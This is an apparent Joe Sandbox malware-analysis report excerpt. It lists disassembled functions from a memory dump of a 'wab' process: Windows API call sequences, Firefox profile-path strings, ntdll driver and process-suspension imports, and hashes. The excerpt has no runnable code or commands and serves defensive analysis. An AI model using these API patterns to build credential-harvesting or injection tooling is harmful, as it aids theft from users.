                                                                                  • API String ID: 577499730-1134094380
                                                                                  • Opcode ID: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                  • Instruction ID: 24bcbd005531c38afe4d7004bd238553ea51a424b60caac2517de9c8923e7683
                                                                                  • Opcode Fuzzy Hash: dd22fc70d251945153f84157bbedf09d5f9a0a96f25b2184ec3973dd1390e5a3
                                                                                  • Instruction Fuzzy Hash: 8FE1F32010C7C19DD332D678884978BBFD45BA7328F484B9EF1E89A2D2D7B98509C767
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmpmemset$_wcsnicmpwcslen$ByteCharMultiWidewcschrwcscpy$memcpystrchrstrlen
                                                                                  • String ID: :stringdata$ftp://$http://$https://
                                                                                  • API String ID: 2787044678-1921111777
                                                                                  • Opcode ID: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                  • Instruction ID: 1dd8f84a331a8d1f0195812dc1f06ff326a48265e58e3ad24d859c5fcdf3acb9
                                                                                  • Opcode Fuzzy Hash: 5cfdb451540a99f12352c14b787623eda213fcfbf47060a2a7a9031bc80669e4
                                                                                  • Instruction Fuzzy Hash: C191C571540219AEEF10EF65DC82EEF776DEF41318F01016AF948B7181EA38ED518BA9
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 0041402F
                                                                                  • GetDlgItem.USER32(?,000003E8), ref: 0041403B
                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 0041404A
                                                                                  • GetWindowLongW.USER32(?,000000F0), ref: 00414056
                                                                                  • GetWindowLongW.USER32(00000000,000000EC), ref: 0041405F
                                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 0041406B
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 0041407D
                                                                                  • GetWindowRect.USER32(?,?), ref: 00414088
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041409C
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004140AA
                                                                                  • GetDC.USER32 ref: 004140E3
                                                                                  • wcslen.MSVCRT ref: 00414123
                                                                                  • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 00414134
                                                                                  • ReleaseDC.USER32(?,?), ref: 00414181
                                                                                  • _snwprintf.MSVCRT ref: 00414244
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00414258
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 00414276
                                                                                  • GetDlgItem.USER32(?,00000001), ref: 004142AC
                                                                                  • GetWindowRect.USER32(00000000,?), ref: 004142BC
                                                                                  • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 004142CA
                                                                                  • GetClientRect.USER32(?,?), ref: 004142E1
                                                                                  • GetWindowRect.USER32(?,?), ref: 004142EB
                                                                                  • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00414331
                                                                                  • GetClientRect.USER32(?,?), ref: 0041433B
                                                                                  • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00414373
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Release_snwprintfwcslen
                                                                                  • String ID: %s:$EDIT$STATIC
                                                                                  • API String ID: 2080319088-3046471546
                                                                                  • Opcode ID: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                  • Instruction ID: eff71af8639f47ea0b7533f6321954d8b94ad3b67000e3ed03306cc56154d199
                                                                                  • Opcode Fuzzy Hash: 4cffa952f3a039c60e8efdb869f217de44d75a47fa5f06f0d0d0713d1b76c38a
                                                                                  • Instruction Fuzzy Hash: F8B1DF71108301AFD721DFA9C985E6BBBF9FF88704F004A2DF69582261DB75E9448F16
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • EndDialog.USER32(?,?), ref: 00413221
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00413239
                                                                                  • SendMessageW.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00413257
                                                                                  • SendMessageW.USER32(?,00000301,00000000,00000000), ref: 00413263
                                                                                  • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0041326B
                                                                                  • memset.MSVCRT ref: 00413292
                                                                                  • memset.MSVCRT ref: 004132B4
                                                                                  • memset.MSVCRT ref: 004132CD
                                                                                  • memset.MSVCRT ref: 004132E1
                                                                                  • memset.MSVCRT ref: 004132FB
                                                                                  • memset.MSVCRT ref: 00413310
                                                                                  • GetCurrentProcess.KERNEL32 ref: 00413318
                                                                                  • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041333B
                                                                                  • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 0041336D
                                                                                  • memset.MSVCRT ref: 004133C0
                                                                                  • GetCurrentProcessId.KERNEL32 ref: 004133CE
                                                                                  • memcpy.MSVCRT ref: 004133FC
                                                                                  • wcscpy.MSVCRT ref: 0041341F
                                                                                  • _snwprintf.MSVCRT ref: 0041348E
                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004134A6
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 004134B0
                                                                                  • SetFocus.USER32(00000000), ref: 004134B7
                                                                                  Strings
                                                                                  • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X, xrefs: 00413483
                                                                                  • {Unknown}, xrefs: 004132A6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_snwprintfmemcpywcscpy
                                                                                  • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X${Unknown}
                                                                                  • API String ID: 4111938811-1819279800
                                                                                  • Opcode ID: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                  • Instruction ID: fb691a4f2f0ee0f23db40d54bf7b3fb7beca904c55697b54c7815e943e903c38
                                                                                  • Opcode Fuzzy Hash: 97bbb4bd5fc40a2980dfba304632497cbec8fb91d9ab00b7ac9f2109681e0e22
                                                                                  • Instruction Fuzzy Hash: A97182B280021DBFEB219F51DC45EEA3B7CFB08355F0440B6F508A6161DB799E948F69
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004011F0
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401202
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401238
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401245
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00401273
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 00401285
                                                                                  • GetModuleHandleW.KERNEL32(00000000,?,?), ref: 0040128E
                                                                                  • LoadCursorW.USER32(00000000,00000067), ref: 00401297
                                                                                  • SetCursor.USER32(00000000,?,?), ref: 0040129E
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004012BF
                                                                                  • ChildWindowFromPoint.USER32(?,?,?), ref: 004012CC
                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004012E6
                                                                                  • SetBkMode.GDI32(?,00000001), ref: 004012F2
                                                                                  • SetTextColor.GDI32(?,00C00000), ref: 00401300
                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00401308
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 00401329
                                                                                  • EndDialog.USER32(?,?), ref: 0040135E
                                                                                  • DeleteObject.GDI32(?), ref: 0040136A
                                                                                  • GetDlgItem.USER32(?,000003ED), ref: 0040138F
                                                                                  • ShowWindow.USER32(00000000), ref: 00401398
                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 004013A4
                                                                                  • ShowWindow.USER32(00000000), ref: 004013A7
                                                                                  • SetDlgItemTextW.USER32(?,000003EE,0045D778), ref: 004013B8
                                                                                  • SetWindowTextW.USER32(?,00000000), ref: 004013CA
                                                                                  • SetDlgItemTextW.USER32(?,000003EA,?), ref: 004013E2
                                                                                  • SetDlgItemTextW.USER32(?,000003EC,?), ref: 004013F3
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: Item$Window$Text$ChildFromPoint$ColorCursorShow$BrushDeleteDialogHandleLoadModeModuleObject
                                                                                  • String ID:
                                                                                  • API String ID: 829165378-0
                                                                                  • Opcode ID: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                  • Instruction ID: caa3714a391556dce09a7e5fb0b25e31ef738818e6d8753142f97b5ec5ee2caf
                                                                                  • Opcode Fuzzy Hash: 19a332b7149b8c9d9d3d6ff7d6a76f82ec59d5834f8b717de0dd62f1513d673f
                                                                                  • Instruction Fuzzy Hash: 0051B134500708AFEB32AF61DC85E6E7BB9FB44301F10093AF552A61F1C7B9A991DB19
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00404172
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  • wcscpy.MSVCRT ref: 004041D6
                                                                                  • wcscpy.MSVCRT ref: 004041E7
                                                                                  • memset.MSVCRT ref: 00404200
                                                                                  • memset.MSVCRT ref: 00404215
                                                                                  • _snwprintf.MSVCRT ref: 0040422F
                                                                                  • wcscpy.MSVCRT ref: 00404242
                                                                                  • memset.MSVCRT ref: 0040426E
                                                                                  • memset.MSVCRT ref: 004042CD
                                                                                  • memset.MSVCRT ref: 004042E2
                                                                                  • _snwprintf.MSVCRT ref: 004042FE
                                                                                  • wcscpy.MSVCRT ref: 00404311
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$wcscpy$_snwprintfwcslen$AttributesFilewcscat
                                                                                  • String ID: AE$General$IsRelative$Path$Profile%d$profiles.ini$EA
                                                                                  • API String ID: 2454223109-1580313836
                                                                                  • Opcode ID: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                  • Instruction ID: 5f54f20862f9259acc4f568515dc65a5c395277ecd0331c6beb9e3a358a2eb32
                                                                                  • Opcode Fuzzy Hash: 14b0d88d68d2695e792434069e0167c5559d7d25d781ac3d9655dfb0e2d65502
                                                                                  • Instruction Fuzzy Hash: 18512FB294012CBADB20EB55DC45ECFB7BCBF55744F0040E6B50CA2142EA795B84CFAA
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040D407: LoadMenuW.USER32(00000000), ref: 0040D40F
                                                                                  • SetMenu.USER32(?,00000000), ref: 00411453
                                                                                  • SendMessageW.USER32(00000000,00000404,00000001,?), ref: 00411486
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00411495
                                                                                  • LoadImageW.USER32(00000000,00000068,00000000,00000000,00000000,00009060), ref: 004114A2
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004114D9
                                                                                  • CreateWindowExW.USER32(00000000,SysListView32,00000000,50810809,00000000,00000000,00000190,000000C8,?,00000103,00000000,00000000), ref: 00411500
                                                                                  • memcpy.MSVCRT ref: 004115C8
                                                                                  • ShowWindow.USER32(?,?), ref: 004115FE
                                                                                  • GetFileAttributesW.KERNEL32(0045E078), ref: 0041162F
                                                                                  • GetTempPathW.KERNEL32(00000104,0045E078), ref: 0041163F
                                                                                  • RegisterClipboardFormatW.USER32(commdlg_FindReplace), ref: 0041167A
                                                                                  • SendMessageW.USER32(?,00000404,00000002,?), ref: 004116B4
                                                                                  • SendMessageW.USER32(?,0000040B,00001001,00000000), ref: 004116C7
                                                                                    • Part of subcall function 00404592: wcslen.MSVCRT ref: 004045AF
                                                                                    • Part of subcall function 00404592: SendMessageW.USER32(?,00001061,?,?), ref: 004045D3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                  • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                  • API String ID: 4054529287-3175352466
                                                                                  • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                  • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                  • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                  • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                  • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                  • API String ID: 3143752011-1996832678
                                                                                  • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                  • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                  • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                  • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                  • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                  • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                  • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                  • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                  • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                  • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                  • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                  • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$HandleModule
                                                                                  • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                  • API String ID: 667068680-2887671607
                                                                                  • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                  • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                  • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                  • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                  • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                  • API String ID: 1607361635-601624466
                                                                                  • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                  • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                  • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                  • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: _snwprintf$memset$wcscpy
                                                                                  • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                  • API String ID: 2000436516-3842416460
                                                                                  • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                  • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                  • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                  • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                    • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                    • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                    • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                    • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                    • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                    • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                    • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                  • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                  • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                  • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                  • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                  • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                  • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                  • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                  • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                  • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                  • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                  • String ID:
                                                                                  • API String ID: 1043902810-0
                                                                                  • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                  • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                  • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                  • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@_snwprintfwcscpy
                                                                                  • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                  • API String ID: 2899246560-1542517562
                                                                                  • Opcode ID: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                  • Instruction ID: ddb1140ba30d93f946c39142265044aeba6ebe712c4753dd77c76fa61262b17a
                                                                                  • Opcode Fuzzy Hash: e17f1f04e88a4cb48931d1772d94f5796c3f29ffdcb1b521dadae3bcfb684220
                                                                                  • Instruction Fuzzy Hash: 434127B2900218BAD704EFA1DC82DDEB7BCBF49305B110167BD05B3152DB78A655CBE8
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 0040DBCD
                                                                                  • memset.MSVCRT ref: 0040DBE9
                                                                                    • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                    • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT ref: 0044480A
                                                                                    • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                    • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                  • wcscpy.MSVCRT ref: 0040DC2D
                                                                                  • wcscpy.MSVCRT ref: 0040DC3C
                                                                                  • wcscpy.MSVCRT ref: 0040DC4C
                                                                                  • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                  • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                  • wcscpy.MSVCRT ref: 0040DCC3
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000001A.00000002.1935213977.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_26_2_400000_wab.jbxd
                                                                                  Similarity
                                                                                  • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                  • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                  • API String ID: 3330709923-517860148
                                                                                  • Opcode ID: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                  • Instruction ID: fd1c33b42c1478e8908a3567a27dc6f764f3595523656020fa754494b197929d
                                                                                  • Opcode Fuzzy Hash: 8014600ebdaa413990019ca607550d51b11cce94ae1a09dd3fff3b2e07bb1862
                                                                                  • Instruction Fuzzy Hash: 2121ACB2D4021876D720B7929C46ECF7B6CAF41759F010477B90C72083DAB95B98CAAE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  APIs
                                                                                    • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                    • Part of subcall function 0040CC26: FindCloseChangeNotification.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                    • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                  • memset.MSVCRT ref: 0040806A
                                                                                  • memset.MSVCRT ref: 0040807F
                                                                                  • _wtoi.MSVCRT ref: 004081AF
                                                                                  • _wcsicmp.MSVCRT ref: 004081C3
                                                                                  • memset.MSVCRT ref: 004081E4
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                    • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                  • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                    • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407E7E
                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407ED7
                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407EEE
                                                                                    • Part of subcall function 00407E1E: _mbscpy.MSVCRT ref: 00407F01
                                                                                    • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
